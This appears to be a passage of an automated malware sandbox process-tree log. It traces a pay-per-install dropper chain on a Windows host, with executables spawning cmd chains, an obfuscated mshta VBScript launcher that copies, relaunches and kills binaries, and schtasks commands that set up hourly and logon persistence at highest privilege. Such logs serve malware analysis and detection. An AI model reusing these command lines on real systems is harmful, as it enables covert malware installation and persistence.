C:\Users\Admin\Pictures\Adobe Films\B2zEVweKaLRoMVSBnxG2zIKP.exe"C:\Users\Admin\Pictures\Adobe Films\B2zEVweKaLRoMVSBnxG2zIKP.exe"4⤵
- Executes dropped EXE
PID:1616
-
-
C:\Users\Admin\Pictures\Adobe Films\1asWT9_23sWIkWvXBfuAHztv.exe"C:\Users\Admin\Pictures\Adobe Films\1asWT9_23sWIkWvXBfuAHztv.exe"4⤵PID:2584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2365⤵
- Program crash
PID:8088
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Q1pBmzxBvVLfgY90IfmvNLJJ.exe"C:\Users\Admin\Pictures\Adobe Films\Q1pBmzxBvVLfgY90IfmvNLJJ.exe"4⤵PID:7720
-
-
C:\Users\Admin\Pictures\Adobe Films\2CBMfkvtUogf9hzCi_qA7oap.exe"C:\Users\Admin\Pictures\Adobe Films\2CBMfkvtUogf9hzCi_qA7oap.exe"4⤵PID:7548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7548 -s 2805⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7612
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Qa0ydjRf2tdAW_WXEvJN1dhr.exe"C:\Users\Admin\Pictures\Adobe Films\Qa0ydjRf2tdAW_WXEvJN1dhr.exe"4⤵PID:7532
-
C:\Users\Admin\AppData\Local\Temp\is-F4COS.tmp\Qa0ydjRf2tdAW_WXEvJN1dhr.tmp"C:\Users\Admin\AppData\Local\Temp\is-F4COS.tmp\Qa0ydjRf2tdAW_WXEvJN1dhr.tmp" /SL5="$10408,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Qa0ydjRf2tdAW_WXEvJN1dhr.exe"5⤵
- Loads dropped DLL
PID:8028 -
C:\Users\Admin\AppData\Local\Temp\is-EF1H5.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-EF1H5.tmp\ShareFolder.exe" /S /UID=27096⤵
- Drops file in Drivers directory
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\20-856f3-888-eca8c-b90f044df7422\SHeviwihyqa.exe"C:\Users\Admin\AppData\Local\Temp\20-856f3-888-eca8c-b90f044df7422\SHeviwihyqa.exe"7⤵PID:5736
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\to1bqwhx.2on\GcleanerEU.exe /eufive & exit8⤵PID:28268
-
C:\Users\Admin\AppData\Local\Temp\to1bqwhx.2on\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\to1bqwhx.2on\GcleanerEU.exe /eufive9⤵PID:30840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 30840 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8176
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe & exit8⤵PID:29040
-
C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exeC:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe9⤵PID:30740
-
C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe"C:\Users\Admin\AppData\Local\Temp\42vghfch.xrq\any.exe" -u10⤵PID:49832
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cd1awdw5.d1g\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:29028
-
C:\Users\Admin\AppData\Local\Temp\cd1awdw5.d1g\installer.exeC:\Users\Admin\AppData\Local\Temp\cd1awdw5.d1g\installer.exe /qn CAMPAIGN="654"9⤵PID:30012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rkgc0cx2.5qx\gcleaner.exe /mixfive & exit8⤵PID:29076
-
C:\Users\Admin\AppData\Local\Temp\rkgc0cx2.5qx\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\rkgc0cx2.5qx\gcleaner.exe /mixfive9⤵PID:31180
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 31180 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9376
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n4tcryki.du0\autosubplayer.exe /S & exit8⤵
- Suspicious use of SetWindowsHookEx
PID:29656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfdoigal.rak\GcleanerEU.exe /eufive & exit8⤵PID:2252
-
C:\Users\Admin\AppData\Local\Temp\xfdoigal.rak\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\xfdoigal.rak\GcleanerEU.exe /eufive9⤵PID:7364
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7364 -s 23610⤵
- Program crash
PID:8768
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f150pmua.u2w\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\f150pmua.u2w\installer.exeC:\Users\Admin\AppData\Local\Temp\f150pmua.u2w\installer.exe /qn CAMPAIGN="654"9⤵PID:3248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe & exit8⤵PID:6292
-
C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exeC:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe9⤵PID:1464
-
C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe"C:\Users\Admin\AppData\Local\Temp\pboj5jlr.n3t\any.exe" -u10⤵PID:8932
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\45lyntr3.ree\gcleaner.exe /mixfive & exit8⤵PID:49100
-
C:\Users\Admin\AppData\Local\Temp\45lyntr3.ree\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\45lyntr3.ree\gcleaner.exe /mixfive9⤵PID:8664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8664 -s 23610⤵
- Program crash
PID:31156
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mqtobfb1.to5\autosubplayer.exe /S & exit8⤵PID:10696
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mSbGRGi7Yiq04OsOdmXbOJGl.exe"C:\Users\Admin\Pictures\Adobe Films\mSbGRGi7Yiq04OsOdmXbOJGl.exe"4⤵PID:7424
-
C:\Users\Admin\AppData\Local\Temp\is-GI393.tmp\mSbGRGi7Yiq04OsOdmXbOJGl.tmp"C:\Users\Admin\AppData\Local\Temp\is-GI393.tmp\mSbGRGi7Yiq04OsOdmXbOJGl.tmp" /SL5="$702D6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mSbGRGi7Yiq04OsOdmXbOJGl.exe"5⤵
- Loads dropped DLL
PID:8052 -
C:\Users\Admin\AppData\Local\Temp\is-AC606.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-AC606.tmp\ShareFolder.exe" /S /UID=27106⤵
- Drops file in Drivers directory
PID:2232 -
C:\Users\Admin\AppData\Local\Temp\52-5cd71-928-ef2ba-3df7538a39203\Xushafufubo.exe"C:\Users\Admin\AppData\Local\Temp\52-5cd71-928-ef2ba-3df7538a39203\Xushafufubo.exe"7⤵PID:4612
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pmxmkkld.uci\GcleanerEU.exe /eufive & exit8⤵PID:31568
-
C:\Users\Admin\AppData\Local\Temp\pmxmkkld.uci\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\pmxmkkld.uci\GcleanerEU.exe /eufive9⤵PID:7800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 23610⤵
- Program crash
- Enumerates system info in registry
PID:11516
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k4igwvkd.ivi\installer.exe /qn CAMPAIGN="654" & exit8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5304 -
C:\Users\Admin\AppData\Local\Temp\k4igwvkd.ivi\installer.exeC:\Users\Admin\AppData\Local\Temp\k4igwvkd.ivi\installer.exe /qn CAMPAIGN="654"9⤵PID:7324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe & exit8⤵PID:6056
-
C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exeC:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe9⤵PID:8760
-
C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe"C:\Users\Admin\AppData\Local\Temp\nba1apdi.pkw\any.exe" -u10⤵PID:9920
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wujdkzya.xge\gcleaner.exe /mixfive & exit8⤵PID:8300
-
C:\Users\Admin\AppData\Local\Temp\wujdkzya.xge\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\wujdkzya.xge\gcleaner.exe /mixfive9⤵PID:9416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9416 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:32596
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ov0r321b.lqk\autosubplayer.exe /S & exit8⤵
- Suspicious use of SetWindowsHookEx
PID:9012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kc3jbdie.qhn\GcleanerEU.exe /eufive & exit8⤵PID:10376
-
C:\Users\Admin\AppData\Local\Temp\kc3jbdie.qhn\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kc3jbdie.qhn\GcleanerEU.exe /eufive9⤵PID:10628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10628 -s 24010⤵
- Program crash
PID:2004
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ozngvw3u.mxm\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:11200
-
C:\Users\Admin\AppData\Local\Temp\ozngvw3u.mxm\installer.exeC:\Users\Admin\AppData\Local\Temp\ozngvw3u.mxm\installer.exe /qn CAMPAIGN="654"9⤵PID:10148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe & exit8⤵PID:9644
-
C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exeC:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe9⤵PID:32116
-
C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe"C:\Users\Admin\AppData\Local\Temp\bcn30dsf.o1s\any.exe" -u10⤵PID:1852
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xleyqqxz.u01\gcleaner.exe /mixfive & exit8⤵PID:3696
-
C:\Users\Admin\AppData\Local\Temp\xleyqqxz.u01\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\xleyqqxz.u01\gcleaner.exe /mixfive9⤵PID:32448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32448 -s 23610⤵
- Program crash
PID:32532
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zczlk0uz.byc\autosubplayer.exe /S & exit8⤵PID:32628
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"4⤵PID:7400
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵PID:7680
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Ry0sLelmoRd_bMBgDPnNMTnO.exe" ) do taskkill -f -iM "%~NxM"6⤵PID:1904
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Ry0sLelmoRd_bMBgDPnNMTnO.exe"7⤵
- Kills process with taskkill
PID:4060
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CmeSFYMVAV502OOB00xIE3du.exe"C:\Users\Admin\Pictures\Adobe Films\CmeSFYMVAV502OOB00xIE3du.exe"4⤵PID:7392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7392 -s 17405⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7452
-
-
-
C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe"C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe"4⤵PID:8036
-
C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe"C:\Users\Admin\Pictures\Adobe Films\atsjEP9tHtbUr6Sjxuvtr01j.exe" -u5⤵PID:2744
-
-
-
C:\Users\Admin\Pictures\Adobe Films\s8SU1s3eNIwgJA57Ks5cMfdE.exe"C:\Users\Admin\Pictures\Adobe Films\s8SU1s3eNIwgJA57Ks5cMfdE.exe"4⤵
- Loads dropped DLL
PID:2004 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Loads dropped DLL
- Adds Run key to start application
PID:7296 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"6⤵
- Suspicious use of FindShellTrayWindow
PID:32860 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff8edc9dec0,0x7ff8edc9ded0,0x7ff8edc9dee07⤵PID:33112
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:27⤵
- Modifies registry class
PID:33324
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=1900 /prefetch:87⤵PID:33388
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2480 /prefetch:17⤵PID:33432
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2468 /prefetch:17⤵PID:33424
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=2376 /prefetch:87⤵PID:33416
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3060 /prefetch:87⤵PID:33576
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3312 /prefetch:27⤵
- Modifies registry class
PID:34116
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3516 /prefetch:87⤵PID:34240
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3888 /prefetch:87⤵PID:34252
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3880 /prefetch:87⤵PID:34584
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,2064161318763603055,17340523823086525777,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw32860_916634593" --mojo-platform-channel-handle=3912 /prefetch:87⤵PID:34932
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6892
-
-
-
C:\Users\Admin\Pictures\Adobe Films\EBU0gvgBJleOPWdQsXtPukc0.exe"C:\Users\Admin\Pictures\Adobe Films\EBU0gvgBJleOPWdQsXtPukc0.exe"2⤵
- Executes dropped EXE
PID:5684 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5684 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4944
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FvMCEwri6_qByE_3M8DbslRU.exe"C:\Users\Admin\Pictures\Adobe Films\FvMCEwri6_qByE_3M8DbslRU.exe"2⤵
- Executes dropped EXE
PID:4872 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5448
-
-
-
C:\Users\Admin\Pictures\Adobe Films\S7koKpK33vLWjAxi5chFkuJ9.exe"C:\Users\Admin\Pictures\Adobe Films\S7koKpK33vLWjAxi5chFkuJ9.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5256
-
-
C:\Users\Admin\Pictures\Adobe Films\aAXlLwdC9UKnsWc8aTXy3Ptd.exe"C:\Users\Admin\Pictures\Adobe Films\aAXlLwdC9UKnsWc8aTXy3Ptd.exe"2⤵
- Executes dropped EXE
PID:5872 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5872 -s 2403⤵
- Program crash
- Enumerates system info in registry
PID:2848
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nxfL7_6XSgUfDUVDEan06Mbe.exe"C:\Users\Admin\Pictures\Adobe Films\nxfL7_6XSgUfDUVDEan06Mbe.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5248
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exeSun0397381f1f458e.exe1⤵
- Executes dropped EXE
PID:3304 -
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exe"C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0397381f1f458e.exe" -u2⤵
- Executes dropped EXE
PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03e4aeb7e43a1c.exeSun03e4aeb7e43a1c.exe1⤵
- Executes dropped EXE
PID:4600 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 2402⤵
- Program crash
PID:4008
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1412 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6140 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6140 -s 4483⤵
- Drops file in Windows directory
- Program crash
PID:6112
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6140 -ip 61401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4064 -ip 40641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3324 -ip 33241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1072
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe dcd4e2d229e6a204038c8ed072934241 t3kpkbwC006FvUI4chaFNw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:5424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4600 -ip 46001⤵PID:6552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3612 -ip 36121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6900
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 432 -p 6020 -ip 60201⤵PID:5164
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1560 -ip 15601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:5164 -
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable2⤵PID:6780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 47081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4872 -ip 48721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5872 -ip 58721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1308
-
